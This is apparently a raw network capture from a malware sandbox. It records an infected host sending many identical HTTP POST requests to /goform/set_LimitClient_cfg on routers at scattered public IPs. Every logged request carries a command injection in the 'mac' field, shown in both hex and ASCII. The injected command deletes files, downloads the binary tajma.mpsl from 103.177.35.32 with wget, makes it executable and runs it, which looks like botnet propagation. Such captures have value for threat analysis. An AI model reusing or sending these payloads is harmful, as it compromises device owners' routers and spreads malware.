                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2509192.168.2.234650469.75.68.1678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486262083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2510192.168.2.2345632178.147.15.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486275911 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2511192.168.2.2356186189.83.59.1448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486315012 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2512192.168.2.2339070199.180.240.1548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486329079 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2513192.168.2.2336166125.193.146.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486332893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2514192.168.2.2359944206.5.234.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486370087 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2515192.168.2.234685637.251.76.1298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486388922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2516192.168.2.2343698109.76.194.2388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486392021 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2517192.168.2.234739834.149.50.2088080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486433029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2518192.168.2.236019296.199.193.1128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486534119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2519192.168.2.2334054110.147.44.428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486552954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2520192.168.2.234214478.160.154.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486620903 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2521192.168.2.2358454171.198.54.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486677885 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2522192.168.2.2360566157.211.127.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486694098 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2523192.168.2.2351478134.196.167.1298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486712933 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2524192.168.2.2333898200.59.203.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486728907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2525192.168.2.234495288.236.69.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486747980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2526192.168.2.23414885.31.28.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486758947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2527192.168.2.2343172135.251.158.468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486762047 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2528192.168.2.234810845.48.73.368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486793041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2529192.168.2.2347070133.13.133.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486844063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2530192.168.2.2339692174.106.179.1058080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486844063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2531192.168.2.2346474156.73.108.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.486896038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
